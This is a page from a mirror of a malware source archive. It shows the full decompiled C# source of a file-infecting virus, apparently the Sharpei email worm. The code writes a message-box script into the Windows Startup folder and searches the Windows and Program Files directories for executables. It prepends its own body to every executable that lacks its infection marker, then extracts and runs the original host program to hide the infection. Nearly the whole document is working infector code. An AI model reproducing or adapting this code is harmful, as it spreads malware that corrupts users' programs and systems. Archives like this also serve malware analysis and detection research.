mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
87 lines
3.4 KiB
C#
87 lines
3.4 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Sharp.Sharp
|
|||
|
// Assembly: Sharp, Version=1.0.786.1197, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: C5414447-1586-4206-9133-31D57E99CDF8
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe
|
|||
|
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
|
|||
|
namespace Sharp
|
|||
|
{
|
|||
|
public class Sharp
|
|||
|
{
|
|||
|
private static string virname = (string) Registry.LocalMachine.OpenSubKey("Software\\Sharp").GetValue("");
|
|||
|
|
|||
|
[STAThread]
|
|||
|
private static void Main()
|
|||
|
{
|
|||
|
StreamWriter text = new FileInfo(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).FullName + "\\Sharp.vbs").CreateText();
|
|||
|
text.Write("MsgBox \"You're infected with Win32.HLLP.Sharp, written in C#, by Gigabyte/Metaphase\",64,\"title\"");
|
|||
|
text.Close();
|
|||
|
string fullName = new DirectoryInfo(Environment.SystemDirectory).Parent.FullName;
|
|||
|
string[] directories = Directory.GetDirectories(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).FullName, "*.*");
|
|||
|
Sharp.Sharp.FileSearch(fullName);
|
|||
|
Sharp.Sharp.FileSearch(directories[11]);
|
|||
|
Sharp.Sharp.FileSearch(directories[12]);
|
|||
|
Sharp.Sharp.FileSearch(directories[13]);
|
|||
|
FileStream fileStream1 = new FileStream(Sharp.Sharp.virname, FileMode.Open, FileAccess.Read);
|
|||
|
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
|
|||
|
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 12288))];
|
|||
|
fileStream1.Seek(12288L, SeekOrigin.Begin);
|
|||
|
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 12288);
|
|||
|
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 12288);
|
|||
|
long length = fileStream2.Length;
|
|||
|
fileStream2.Close();
|
|||
|
if (length > 0L && !Sharp.Sharp.virname.EndsWith("MS02-010.exe"))
|
|||
|
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
|
|||
|
while (File.Exists("temp.exe"))
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
File.Delete("temp.exe");
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static void FileSearch(string DirectoryToCheck)
|
|||
|
{
|
|||
|
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
|
|||
|
int length = files.Length;
|
|||
|
for (int index = 0; index < length; ++index)
|
|||
|
{
|
|||
|
string str = files[index];
|
|||
|
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
|
|||
|
fileStream1.Seek(18L, SeekOrigin.Begin);
|
|||
|
int num = fileStream1.ReadByte();
|
|||
|
fileStream1.Close();
|
|||
|
if (num != 103)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
File.SetAttributes(str, FileAttributes.Normal);
|
|||
|
File.Copy(str, "hostcopy.exe", true);
|
|||
|
File.Copy(Sharp.Sharp.virname, str, true);
|
|||
|
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
|
|||
|
FileStream fileStream3 = new FileStream(str, FileMode.Append);
|
|||
|
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
|
|||
|
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
|
|||
|
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
|
|||
|
fileStream2.Close();
|
|||
|
fileStream3.Close();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
File.Delete("hostcopy.exe");
|
|||
|
}
|
|||
|
}
|
|||
|
}
|